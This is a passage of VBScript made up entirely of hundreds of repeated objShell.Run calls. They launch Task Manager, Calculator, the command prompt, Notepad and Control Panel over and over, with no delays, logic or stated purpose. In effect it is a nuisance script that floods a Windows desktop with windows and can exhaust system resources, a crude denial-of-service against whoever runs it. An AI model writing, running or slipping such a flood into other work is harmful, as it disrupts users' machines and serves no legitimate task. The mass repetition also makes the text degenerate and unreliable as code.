objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

